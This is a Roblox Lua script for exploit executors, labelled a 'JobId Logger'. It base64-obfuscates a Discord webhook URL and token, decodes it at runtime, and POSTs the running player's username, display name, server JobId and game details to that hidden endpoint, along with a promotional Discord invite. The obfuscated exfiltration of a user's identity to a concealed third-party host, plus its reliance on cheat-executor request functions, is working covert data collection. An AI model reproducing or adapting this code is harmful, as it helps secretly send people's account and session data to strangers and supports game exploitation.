local v1 = "aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTM3NDMyMjg2MDEzMDA0MTg3OC9RMzNubElmM29QcEpZdzc3cy1kRk5xLUVYNThaNUMySV91VDBvcG5zMWNOb2tWYXVtcFpFWEVlQkE3VTZYTmluX3pxUw=="
local function decode(b64)
	local b = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
	b64 = b64:gsub('[^'..b..'=]', '')
	return (b64:gsub('.', function(x)
		if (x == '=') then return '' end
		local r,f='',(b:find(x)-1)
		for i=6,1,-1 do r=r..(f%2^i - f%2^(i-1) > 0 and '1' or '0') end
		return r
	end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x)
		if (#x ~= 8) then return '' end
		local c=0
		for i=1,8 do c=c+(x:sub(i,i)=='1' and 2^(8-i) or 0) end
		return string.char(c)
	end))
end

local h = game:GetService("HttpService")
local p = game:GetService("Players").LocalPlayer
local m = game:GetService("MarketplaceService")
local d = p.Name
local dn = p.DisplayName
local j = game.JobId
local pid = game.PlaceId
local ver = game.PlaceVersion
local gname = "Unknown Game"

pcall(function()
	gname = m:GetProductInfo(pid).Name
end)

local payload = {
	username = "JobId Logger",
	avatar_url = "https://tr.rbxcdn.com/4d43b3eb18276bcf264b4c9f93b43db4/150/150/Image/Png",
	embeds = {{
		title = "📡 New Server Pinged!",
		description = "[🌐 Join Synthix Community Discord!](https://discord.gg/bJharfW4Ku)",
		color = 0x00FFFF,
		fields = {
			{
				name = "🎮 Game",
				value = string.format("[%s](https://www.roblox.com/games/%d)", gname, pid),
				inline = false
			},
			{
				name = "🧠 Requested By",
				value = string.format("**%s** (@%s)", dn, d),
				inline = true
			},
			{
				name = "🆔 Job ID",
				value = string.format("
\n%s\n
", j),
				inline = false
			},
			{
				name = "🛠️ Place Version",
				value = tostring(ver),
				inline = true
			}
		},
		footer = {
			text = "🔧 Made by Synthix"
		},
		timestamp = os.date("!%Y-%m-%dT%H:%M:%SZ")
	}}
}

local req = syn and syn.request or http_request or request or (fluxus and fluxus.request)
if not req then return warn("❌ Your executor doesn't support HTTP requests.") end

local success, err = pcall(function()
	req({
		Url = decode(v1),
		Method = "POST",
		Headers = {
			["Content-Type"] = "application/json"
		},
		Body = h:JSONEncode(payload)
	})
end)

if success then
	print("✅ Webhook sent successfully.")
else
	warn("❌ Webhook failed:", err)
end
